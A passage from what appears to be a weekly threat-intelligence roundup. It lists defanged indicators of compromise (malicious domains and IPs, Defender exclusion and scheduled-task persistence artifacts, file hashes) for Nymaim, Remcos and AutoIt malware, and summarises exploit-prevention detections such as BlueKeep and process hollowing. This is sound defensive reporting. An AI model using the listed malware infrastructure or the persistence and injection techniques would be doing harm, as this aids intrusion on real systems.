DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\exlrqyet ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\wpdjiqwl ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\tmagfnti ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\zsgmltzo ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\slzfemsh ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\mftzygmb ` | 1 \nMutexes | Occurrences \n---|--- \n`sejavpsfushosuk` | 7 \n`None` | 4 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`69[.]55[.]5[.]252` | 18 \n`85[.]114[.]134[.]88` | 18 \n`239[.]255[.]255[.]250` | 17 \n`192[.]0[.]47[.]59` | 17 \n`46[.]28[.]66[.]2` | 17 \n`78[.]31[.]67[.]23` | 17 \n`188[.]165[.]238[.]150` | 17 \n`93[.]179[.]69[.]109` | 17 \n`176[.]9[.]114[.]177` | 17 \n`172[.]217[.]197[.]26/31` | 16 \n`172[.]217[.]7[.]132` | 16 \n`168[.]95[.]5[.]112/31` | 15 \n`46[.]4[.]52[.]109` | 14 \n`43[.]231[.]4[.]7` | 14 \n`209[.]85[.]202[.]26/31` | 13 \n`98[.]136[.]96[.]92/31` | 13 \n`67[.]195[.]204[.]72/30` | 13 \n`216[.]146[.]35[.]35` | 12 \n`211[.]231[.]108[.]46/31` | 12 \n`12[.]167[.]151[.]116/30` | 12 \n`67[.]195[.]228[.]86/31` | 12 \n`168[.]95[.]6[.]56/29` | 12 \n`64[.]233[.]186[.]26/31` | 11 \n`192[.]0[.]56[.]69` | 11 \n`96[.]114[.]157[.]80` | 10 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`microsoft-com[.]mail[.]protection[.]outlook[.]com` | 18 \n`252[.]5[.]55[.]69[.]in-addr[.]arpa` | 18 \n`schema[.]org` | 17 \n`whois[.]iana[.]org` | 17 \n`whois[.]arin[.]net` | 17 \n`252[.]5[.]55[.]69[.]zen[.]spamhaus[.]org` | 17 \n`252[.]5[.]55[.]69[.]bl[.]spamcop[.]net` | 17 \n`252[.]5[.]55[.]69[.]sbl-xbl[.]spamhaus[.]org` | 17 \n`252[.]5[.]55[.]69[.]cbl[.]abuseat[.]org` | 17 \n`252[.]5[.]55[.]69[.]dnsbl[.]sorbs[.]net` | 17 \n`bestladies[.]cn` | 16 \n`bestdates[.]cn` | 16 \n`bestgirlsdates[.]cn` | 16 \n`sex-finder4you1[.]com` | 16 \n`eur[.]olc[.]protection[.]outlook[.]com` | 14 \n`aol[.]com` | 13 \n`mx-aol[.]mail[.]gm0[.]yahoodns[.]net` | 13 \n`hotmail-com[.]olc[.]protection[.]outlook[.]com` | 13 \n`smtp[.]secureserver[.]net` | 12 \n`mx-eu[.]mail[.]am0[.]yahoodns[.]net` | 11 \n`msa[.]hinet[.]net` | 11 \n`myibc[.]com` | 11 \n`ipinfo[.]io` | 10 \n`hotmail[.]fr` | 10 \n`mx1[.]comcast[.]net` | 10 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%SystemRoot%\\SysWOW64\\config\\systemprofile` | 18 \n`%SystemRoot%\\SysWOW64\\config\\systemprofile:.repos` | 18 \n`%SystemRoot%\\SysWOW64\\<random, matching '[a-z]{8}'>` | 18 \n`%TEMP%\\<random, matching '[a-z]{8}'>.exe` | 18 \n`%HOMEPATH%` | 14 \n`%System32%\\<random, matching '[a-z]{8}\\[a-z]{6,8}'>.exe (copy)` | 14 \n`%TEMP%\\kjzvcyd.exe` | 1 \n \n#### File Hashes\n\n` 005ac256dddc3a368386cf19e2c8ff4ff897453e13d31c2a002389b1b8f6f0e6 0225cfc00d03fb8135dab6acdbb2165f678c8693927dd4e8180b7ddfa8bdcbae 2ecaa4a4541645f3d329b65981f97403c3a3cc2bf77feeecef4cc5108e5eb649 357ed9b86a1c594596641c650bce143f7d58f42c6c67fd508168389805eb2739 3ce3671481b73bf71782605b8e6429753a3c7a253b6ff8dd0c80af28eb881633 53210cdce3d628a61c5aed9fcad723d30634f6df74a8118183f9bfa8ba0b643e 53b68915686769a14855c37ad232b86f7d982d7c88e74ff641f1046612e04011 57917ee62c89309f3ac65a67ef6b3e983c2b882a9770e43b0095edb348ae9cb4 7e8a5dedb5852ba8f9f3970c0204657611bb7b3e8009c019e7105b7528111403 8f1d942a42022e2ad2c7ea175e742fc83785883df3e32e2f696cccb1785f9b04 9f23b12abc917fd84e47626f4695a2f811352dcf100224623dbb1343c2503bd2 a55ef46691eeebb5afe92223a87d8fa1332dc8406d5933d6dbadfebbea6708cc b833f9b5e15ceb0e9553dba19386e5f9420795251c499aee1f4dde3c19ae5571 bae92bcf28992f8a71f9216af418f3a38ca58435b0be6e9e998ba30680a9aa49 cf5208d9d87f44c5adc6cb07f050fa11693654384840cbf3f8ef6c7bcb299c39 d8cb668abbc88169df7393ef917f8214b53192c1cac6e372f46f048416fffe89 e29f7b44dbc846b438af94610b75f5d091ea15308536dfa337bf8c27bc80acdd e60fa6d29dcbac234244922ed994abff1e02a63ca62bdd7efb1393a1c22052c5 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-8Kq23Qa1778/XlAWqtd6NLI/AAAAAAAADV8/fiphdVkZgcIcuayjrNb6owB3HW_Kp5yqACLcBGAsYHQ/s1600/d8cb668abbc88169df7393ef917f8214b53192c1cac6e372f46f048416fffe89_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-QRkfMrevaBw/XlAWv-azupI/AAAAAAAADWA/kIoAMlzXIv4RXqxEWVZhwiu_BoX8rP8ngCLcBGAsYHQ/s1600/d8cb668abbc88169df7393ef917f8214b53192c1cac6e372f46f048416fffe89_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-Wyi1S0kwqv4/XlAW0uC8U9I/AAAAAAAADWE/AgVUp_QzAtcRQ7e7APZMKYN_rQsK5L-DgCLcBGAsYHQ/s1600/effb9e9a8eedfc5d51c94309cc0df29e70e376d245d9446e05f4fd1789dd6dc1_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Malware.Nymaim-7586870-1\n\n#### Indicators of Compromise\n\n * IOCs collected from dynamic analysis of 25 samples\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\GOCFK ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\KPQL ` | 25 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER \nValue Name: GlobalAssocChangedCounter ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\GOCFK \nValue Name: mbijg ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\KPQL \nValue Name: efp ` | 25 \nMutexes | Occurrences \n---|--- \n`Local\\{2D6DB911-C222-9814-3135-344B99BBA4BA}` | 25 \n`Local\\{369514D7-C789-5986-2D19-AB81D1DD3BA1}` | 25 \n`Local\\{D0BDC0D1-57A4-C2CF-6C93-0085B58FFA2A}` | 25 \n`Local\\{D8E7AB94-6F65-71DE-8DA1-FE621BE2E606}` | 25 \n`Local\\{F04311D2-A565-19AE-AB73-281BA7FE97B5}` | 25 \n`Local\\{F6F578C7-92FE-B7B1-40CF-049F3710A368}` | 25 \n`Local\\{445DE72D-9B60-6571-D392-6925F65F5FE7}` | 25 \n`Local\\{E41B13B6-7B07-8560-4026-41A66FCE339D}` | 25 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`46[.]4[.]52[.]109` | 1 \n`93[.]179[.]69[.]109` | 1 \n`78[.]31[.]67[.]23` | 1 \n`176[.]9[.]114[.]177` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`neawce[.]in` | 24 \n`cawugh[.]pw` | 24 \n`bfjtkee[.]in` | 24 \n`xnexvlnlm[.]in` | 24 \n`xirvjdkza[.]pw` | 24 \n`njzcxk[.]in` | 24 \n`ozbpuhdibrq[.]in` | 24 \n`kniqbngezi[.]net` | 24 \n`pbgtihnv[.]com` | 24 \n`gxdawu[.]net` | 24 \n`gxvim[.]com` | 19 \n`nkkzhqqslod[.]com` | 19 \n`tiuzomycjp[.]com` | 19 \n`wzfhxytur[.]net` | 19 \n`cdnnoeem[.]net` | 19 \n`qlqywqinnnof[.]net` | 19 \n`upfqangse[.]net` | 19 \n`cxtuswfapphv[.]net` | 19 \n`vgazbwj[.]net` | 19 \n`apdkokb[.]net` | 19 \n`xknfwgwvcut[.]net` | 19 \n`jwieiuggex[.]com` | 19 \n`rpwecn[.]net` | 19 \n`wcafbjwj[.]com` | 19 \n`bjeuewe[.]pw` | 19 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%ProgramData%\\ph` | 25 \n`%ProgramData%\\ph\\eqdw.dbc` | 25 \n`%ProgramData%\\ph\\fktiipx.ftf` | 25 \n`%TEMP%\\gocf.ksv` | 25 \n`%TEMP%\\kpqlnn.iuy` | 25 \n`%TEMP%\\fro.dfx` | 19 \n`%TEMP%\\npsosm.pan` | 19 \n`\\Documents and Settings\\All Users\\pxs\\dvf.evp` | 19 \n`\\Documents and Settings\\All Users\\pxs\\pil.ohu` | 19 \n \n#### File Hashes\n\n` 0218e9c2cf3ca8f6201331e44bfa7d8a5448b1b5b08d8b14d85aebb65671e1a2 0454d49281ad2a9f99228f543428338353da11fbf78e36b7f5b31479c121bf6b 056dc90528fe0b52da0e2810dfecc00a33ecb3fb055d4b1887b06ab042dbae1e 09136689c46634da3d89dc3609bc2db9582cf70992b9ef92ef6c7dfb3416bee2 0a58ad96a90964d56735bf61afa86fa7c6a2a3e15092b66154c6418465bb3a00 0cbed52d77571cb00e68ca65ed017272b69c2b90b548f5a3354dec2fd4da677c 1725392d15f6eeee49ba8222c595faeb59a5434b9136b137dc03a9b61e084087 17f077b3721d13d89bfe4d84b297620ff8590b9949e0b3a90e754cd147808695 201591910712d7b75f17831436b9c2c7a5bc95e6009d7a744de0fd2fe34a1dc6 20b70cb79a5bef35145254e2c456da2d2d90f7e2de2f72d413ce0fbf844af66f 2696cc5afb7daf7e9acfa6b48e9c925961c8b3675d4dba20fcd840879695f8dd 287f5e0b40f6341f7f9b09a97d2efbb00b9c389053b76976ccade63027f02425 2b0b69fcba2279c7c731adc17ce5e395739a4d957afe75b4dffe79a911d06834 3343d61a8a5e8f19686995852ac47dec453da1a61f0544a2b6cc75b404ac40c1 37c3c75c995da210c09a6b6e258af839386c4a8661d16395ef179065326ebbd7 39c08d0ebe20734e86539503b615716ef692aa37ba6a490e0265d1560dbae71c 3cfc8edcb512891aeb4241df6a800981d83c329883eaeeb265f5b555be7c85a4 43983a108eee5452032f21f6895cb9d930af372f4fbbf51e217a58f68412c9c4 44033bd26650bac58f19414b2f937a3d0aebd819a145738d4d9e77a087d1b2e2 446952c8181f0736647c99e3d4160fafcf272c885a62b19e4028a41183227292 473e6d64b9b5d33250f89781d2d7d0b7a763563e6703907953ae226e078b2a49 589b303963958d48a6d5aa9a506955ed04242994f1f7e36b8819463200970b21 5b186038f17adbde16e02e1e29513354112ecdc9b3a8be5fe2978696ce9541ec 5d95754de0c3bda4841e7122b0b24bd5d949adc647735582d4e6af72274950d7 6123859235132aed86f0520e20d623e8d5d0438e082db32caf310d1b77aa9ec3 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-OG-L904Vn18/XlAXHITP77I/AAAAAAAADWQ/58z-UNX2ZcwxM4f-RKL2jr3MDrATwbkqwCLcBGAsYHQ/s1600/6123859235132aed86f0520e20d623e8d5d0438e082db32caf310d1b77aa9ec3_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-czb2GTKRPog/XlAXLbX7ecI/AAAAAAAADWU/T1OGSMtUOxI1_pYlID0Q4oE2rTTvhoxsQCLcBGAsYHQ/s1600/6123859235132aed86f0520e20d623e8d5d0438e082db32caf310d1b77aa9ec3_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-8kmO8BmA0xA/XlAXQaSHx1I/AAAAAAAADWY/etbRo-kD2cwYpQMpWjXwkfdjLaAr28kOACLcBGAsYHQ/s1600/bfd8049c2e3148a9939345d4afbffca668c8fc6557ed219e0afe7fb7239757ef_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Ransomware.Remcos-7586925-1\n\n#### Indicators of Compromise\n\n * IOCs collected from dynamic analysis of 12 samples\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\OSRS18HD-UKGZDR ` | 12 \n`<HKCU>\\SOFTWARE\\OSRS18HD-UKGZDR \nValue Name: EXEpath ` | 12 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\SCHEDULE\\TASKCACHE\\TASKS \nValue Name: Path ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\SCHEDULE\\TASKCACHE\\TASKS \nValue Name: Hash ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\SCHEDULE\\TASKCACHE\\TASKS \nValue Name: Triggers ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\SCHEDULE\\TASKCACHE\\TASKS \nValue Name: DynamicInfo ` | 1 \nMutexes | Occurrences \n---|--- \n`Remcos_Mutex_Inj` | 12 \n`OSRS18hd-UKGZDR` | 12 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`secure[.]jagexlaucher[.]top` | 12 \nFiles and or directories created | Occurrences \n---|--- \n`%SystemRoot%\\win.ini` | 12 \n`%APPDATA%\\ErrorLogs` | 12 \n`%APPDATA%\\ErrorLogs\\logs.dat` | 12 \n`%System32%\\Tasks\\SearchUI` | 12 \n`%APPDATA%\\SearchUI.exe` | 12 \n`%SystemRoot%\\Tasks\\SearchUI.job` | 9 \n \n#### File Hashes\n\n` 08606543b261293be2c91acebdd4100b77471a2cb2f29b8f558f2d12dd01c954 2d5275f0deb740be06001aa53d8719db88d08426f2e5f1b44bc4626fcc9b0258 46835bd196f40e56dfeb8fbdbf1e328358e545649ce10aa580575874ffeba5b1 778608ebdb66b22322989f6889668d11a5c243f540d094f834743651f847f6d3 b1edb734e012c5b941e7e7190b23c472937b5332b9af826e5eb07a807c7f0e80 c0a687a74845e57c671768eac45588576a194f36165279f19edb22d45a595904 cd9d9e7f425fbc41e1c6e12e7e9ffd0d9800aa703e690802a260f5f29837967a dc789666026dacfc446d3559c0aebeab538608668fac6645ba73591d9a4ced58 dda31fb5d2659b268d9f12541f26042e626d6162c442362b362f0eb80011c741 e6d0a9641a275e95ed0835cc1c65f861f03e6643b99ef24bb1b1e6711fe6b31e ec8cc8dd06095a94275b3e3f7564dfddbcb20ce78b84da301768b0e8484482a5 f21bb31466c5f318f41c021fc459caf0e413f580ade991087bc499bb5fa2ffa7 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-OCZh_5WKX4A/XlAXxzi7llI/AAAAAAAADWs/l0MRwd-H_FQX9hO6h82duW602Y_udYlSACLcBGAsYHQ/s1600/08606543b261293be2c91acebdd4100b77471a2cb2f29b8f558f2d12dd01c954_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-522EmBaPe3k/XlAX2_imhbI/AAAAAAAADWw/aCBPjlPJmE4omZv-JrgBKhT-hFziXA6SQCLcBGAsYHQ/s1600/08606543b261293be2c91acebdd4100b77471a2cb2f29b8f558f2d12dd01c954_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Malware.Autoit-7586956-0\n\n#### Indicators of Compromise\n\n * IOCs collected from dynamic analysis of 25 samples\nRegistry Keys | Occurrences \n---|--- \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\WPAD\\{E54C0DDD-6FAB-4796-8BBE-EE37AF7CD25A} ` | 25 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS \nValue Name: ProxyEnable ` | 25 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS \nValue Name: ProxyServer ` | 25 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS \nValue Name: ProxyOverride ` | 25 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS \nValue Name: AutoConfigURL ` | 25 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS \nValue Name: AutoDetect ` | 25 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\CONNECTIONS \nValue Name: SavedLegacySettings ` | 25 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\WPAD\\{E54C0DDD-6FAB-4796-8BBE-EE37AF7CD25A} \nValue Name: WpadDecisionReason ` | 25 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\WPAD\\{E54C0DDD-6FAB-4796-8BBE-EE37AF7CD25A} \nValue Name: WpadDecision ` | 25 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\WPAD\\{E54C0DDD-6FAB-4796-8BBE-EE37AF7CD25A} \nValue Name: WpadNetworkName ` | 25 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\WPAD\\{E54C0DDD-6FAB-4796-8BBE-EE37AF7CD25A} \nValue Name: WpadDetectedUrl ` | 25 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\5.0\\CACHE\\CONTENT \nValue Name: CachePrefix ` | 25 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\5.0\\CACHE\\COOKIES \nValue Name: CachePrefix ` | 25 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\5.0\\CACHE\\HISTORY \nValue Name: CachePrefix ` | 25 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SCHEDULE \nValue Name: NextAtJobId ` | 25 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP \nValue Name: ProxyBypass ` | 25 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP \nValue Name: IntranetName ` | 25 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP \nValue Name: UNCAsIntranet ` | 25 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP \nValue Name: AutoDetect ` | 25 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\WPAD ` | 25 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\WPAD\\C8-B0-99-0A-48-DD ` | 1 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\WPAD\\{E54C0DDD-6FAB-4796-8BBE-EE37AF7CD25A}\\C8-B0-99-0A-48-DD ` | 1 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\WPAD\\C8-B0-99-0A-48-DD \nValue Name: WpadDecisionReason ` | 1 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\WPAD\\C8-B0-99-0A-48-DD \nValue Name: WpadDecisionTime ` | 1 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\WPAD\\C8-B0-99-0A-48-DD \nValue Name: WpadDecision ` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`199[.]59[.]242[.]153` | 25 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`infikuje[.]freevnn[.]com` | 25 \n`11776[.]bodis[.]com` | 20 \nFiles and or directories created | Occurrences \n---|--- \n`\\atsvc` | 25 \n`%System32%\\winevt\\Logs\\Microsoft-Windows-Known Folders API Service.evtx` | 25 \n`%System32%\\Tasks\\At1` | 25 \n`%SystemRoot%\\Tasks\\At1.job` | 25 \n`%SystemRoot%\\SysWOW64\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\counters.dat` | 25 \n`%SystemRoot%.exe` | 25 \n`\\Documents and Settings.exe` | 25 \n`\\MSOCache.exe` | 25 \n`\\PerfLogs.exe` | 25 \n`%ProgramFiles(x86)%.exe` | 25 \n`%ProgramFiles%.exe` | 25 \n`%ProgramData%.exe` | 25 \n`\\Recovery.exe` | 25 \n`\\TEMP.exe` | 25 \n`\\Users.exe` | 25 \n`%SystemRoot%\\svhost.exe` | 25 \n`\\$Recycle.Bin.exe` | 25 \n`%SystemRoot%\\Driver.db` | 25 \n`e:\\System Volume Information.exe` | 25 \n`e:\\$RECYCLE.BIN.exe` | 25 \n`\\starup.exe` | 25 \n`\\System Volume Information.exe` | 25 \n`%SystemRoot%\\SysWOW64\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\list[1].htm` | 25 \n`%SystemRoot%\\list.txt` | 25 \n`%HOMEPATH%\\Local Settings\\History\\History.IE5\\desktop.ini` | 20 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 0cfd5fcfbe7dcb0ca5d046e97815d68b7afec7562255c591efaf6e6ddff04dc3 176e3815db0582a528559fcd4ac5d556d8b44354470ef7000246a7dd70e02042 188fb9f78f7b0ec6ef4ddac9d5c3e246563a9d5e4689b49c5b4be343be805be6 1e401c8be910e4f07af2e40c1c20b25be23e896e3aef6c887bc505b4ffee805a 25290bd54de5289d9ea3cbcbf59fefa0a7efa1743196043989029d3b1a3aa23f 2c52210a40af62a33415f9d5fc31cf4ed0c9d60d87dc97fa53db86c028b4a486 2db7594e73018d54e9dca34869eed6fa7e523fd519e2cdc74a32a91d31c6a945 30226cf05067f4906bec842742691778bfe2f277a3ee3ebf82ebc5a2d313806c 32f9cec632967d84f191d9bb514409dcff9f4d8e59097e98fa72e74cbfd32ce9 3909a29ead2eb2248f107c1352e5259d244b3eda0c971b136fab7e671f63a7e2 3b2f4a185951364a131c6ece1b282f7442045063f0d00562bd1c462ddc45e8e5 433b74fd6206dcc64cdc96141263cf1fc5720f087e15ddb581b2084ba0604c1c 4544acce7aad2dc7f8ffc93815eaea59f714552a21863a70132a742e4938a852 478d53130c7b549c54401d4d1c8501a310e99a350846e0515ef8d416822d4ada 4872d9c8e75aa6ad18a1272b17c617811eff6c411f181cc450a52be747fc4d20 48d8d3219b405e7a7ac7e53dac401be58e50cc582d4d5a2c96eb3edab10a8920 4e0b6052c58992f28138a28c281c4bca93f3f90c6c14ef3b88ff697c821e3f34 520f5cfd75870100df9da88875a9d6aef2dae064901acf35695c7ea0d8f36410 56641ea2594a21e5aa25475b295b5130e49c94c78ec42d45b1aed9cf929ea300 65e7b497cebcd23ceb769656cc011a3cadfdd618657a0d66e14a63f94a113fcd 6b1821395bbba2f70b42f963dd63772d4dc97b9dcfeb13ea592ead01587c36d2 6f416a86789e81f95138751a71006189bf6e1215d8ea2063c370862738a996a3 75c38fa29ebe45c102663815d76491a566e34e404dd99088fb4257744539ed6e 78f0240b6e9c1a74546845b3d0ddfc84aecc388f8ff7d794cf80e33ae0de4c31 7f2e6da85f7ebb3dd066315504735c8dbcc4cdbc9c24d7d944cdeeb09df1c869 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-6UR3_BxWZG4/XlAYrj5bubI/AAAAAAAADXA/n9kjrsyMa_8Yg0LTzxs4edXXumgnJtSsQCLcBGAsYHQ/s1600/65e7b497cebcd23ceb769656cc011a3cadfdd618657a0d66e14a63f94a113fcd_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-f5odaR7Z7zg/XlAYvLgvk6I/AAAAAAAADXE/ovS8NjQs2fAT0MVvUEVrwGW9B33R6lsgQCLcBGAsYHQ/s1600/65e7b497cebcd23ceb769656cc011a3cadfdd618657a0d66e14a63f94a113fcd_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n## Exploit Prevention\n\nCisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities. \nCVE-2019-0708 detected \\- (3408) \n--- \nAn attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP) request. Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction. \nExcessively long PowerShell command detected \\- (414) \nA PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats. \nProcess hollowing detected \\- (210) \nProcess hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead. \nKovter injection detected \\- (143) \nA process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns. \nGamarue malware detected \\- (114) \nGamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system. \nInstallcore adware detected \\- (97) \nInstall core is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware. \nDealply adware detected \\- (90) \nDealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware. \nAtom Bombing code injection technique detected \\- (21) \nA process created a suspicious Atom, which is indicative of a known process injection technique called Atom Bombing. Atoms are Windows identifiers that associate a string with a 16-bit integer. These Atoms are accessible across processes when placed in the global Atom table. Malware exploits this by placing shell code as a global Atom, then accessing it through an 